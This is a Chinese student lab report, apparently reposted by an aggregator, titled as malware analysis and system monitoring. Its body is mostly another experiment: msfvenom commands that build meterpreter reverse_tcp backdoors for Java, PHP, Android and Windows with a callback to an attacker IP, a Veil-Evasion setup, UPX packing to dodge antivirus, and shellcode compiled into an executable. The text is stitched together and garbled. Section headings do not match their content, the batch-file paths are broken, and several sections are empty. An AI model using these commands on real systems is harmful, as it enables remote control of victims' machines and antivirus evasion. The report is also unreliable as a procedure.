Exp4 恶意代码分析

Posted seven-moon

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Exp4 恶意代码分析相关的知识,希望对你有一定的参考价值。


一、实验目标

1、是监控你自己系统的运行状态,看有没有可疑的程序在运行。
2、分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysinternals,systracer套件。
3、假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路,先整个系统监控看能不能找到可疑对象,再对可疑对象进行进一步分析,好确认其具体的行为与性质。

二、思考题

(一)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。

1、使用一些工具帮助自己监测系统,可以实时监控电脑上的端口信息,如果某个进程启动的时候连接了一些看起来很可疑的端口,就可以进一步进行分析。
2、使用windows自带的schtasks指令设置一个计划任务,每隔一定的时间对主机的联网记录等进行记录,如果自己的电脑没有联网的情况下出现了ip访问记录就可以进一步分析了。
3、通过sysmon监控计算机中的重要操作,可以在事件查看器中找到相关日志进行查看。

(二)如果已经确定是某个程序或进程有问题,你有什么工具可以进一步得到它的哪些信息。

1、利用wireshark动态分析程序动向,监视其与主机进行的通信过程。
2、利用systracer工具分析恶意软件。
3、利用PE explorer工具对程序调用库等信息进行分析查看,还可以对其反汇编。

三、实践过程

(一)使用schtasks指令监控系统

1、C盘建立一个netstatlog.bat文件,用来将记录的联网结果格式化输出到netstatlog.txt文件中
netstatlog.bat:

date /t >> c:
etstatlog.txt
time /t >> c:
etstatlog.txt
netstat -bn >> c:
etstatlog.txt

2、在CMD下,使用schtasks /create /TN netstat5303 /sc MINUTE /MO 5 /TR "cmd /c netstat -bn > c: etstatlog.txt"命令创建计划任务netstat5303

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 x> 5328_backdoor_java.jar

图jar
3、生成php文件,并用VirusTotal进行扫描

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 x> 5328_backdoor.php

图php
4、生成apk文件,并用VirusTotal进行扫描

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 R> 5328_backdoor.apk

图apk

(二)使用sysmon工具监控系统

安装veil-evasion的时候照着Veil-Evasion下载、安装、使用教程上的步骤安装还算比较顺利,就是真的好慢,装了n个小时。
图Veli安装
图Veli1

1、启动evail-evasion
图启动

2、设置好回连的IP地址和端口号后,生成后门文件

3、用VirusTotal进行扫描
图Veil扫描

(三)使用VirusTotal分析恶意软件

1、对(一)1中的5328_backdoor.exe进行加壳

upx 5328_backdoor.exe -o 5328_backdoor_upx.exe

图upx(额,显示文件太小)

2、对(一)1中的met-encoded10.exe进行加壳

upx met-encoded10.exe -o met-encoded10_upx.exe

图upx1(加壳成功)

3、用VirusTotal进行扫描
图upx扫描(发现加壳之后被查出的概率增加了【捂脸】)

(四)使用Process Monitor分析恶意软件

1、在kali主机下,进入终端,执行指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=5328 -f c生成一个c语言格式的Shellcode数组
图生成Shellcod

2、创建一个C文件:shellcode_5328.c,将上面生成的数组copy到该文件下,并加入一个主函数
图c文件

3、使用i686-w64-mingw32-g++ shellcode_5328.c -o shellcode_5328_backdoor.exe命令将该C语言代码shellcode_5328.c转换为一个可在64位windows系统下操作的可执行文件shellcode_5328_backdoor.exe
图转化

4、用VirusTotal进行扫描
图shellcode扫描

5、将可执行文件放到主机上检测
图主机shellcode检测(可以发现这个文件刚放到主机上,就立即被查杀了)

(五)使用Process Explorer分析恶意软件

(六)使用PEiD分析恶意软件

(七)使用PEiD分析恶意软件

四、实践总结与体会

五、参考资料

免杀原理与实践
杀毒软件工作原理 及 现在主要杀毒技术
Veil-Evasion下载、安装、使用教程
kali安装veil和apt基本命令

以上是关于Exp4 恶意代码分析的主要内容,如果未能解决你的问题,请参考以下文章

2018-2019 20165208 网络对抗 Exp4 恶意代码分析

2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析

2018-2019 20165226 Exp4:恶意代码分析

Exp4 恶意代码分析

# Exp4 恶意代码分析

20155301 Exp4 恶意代码分析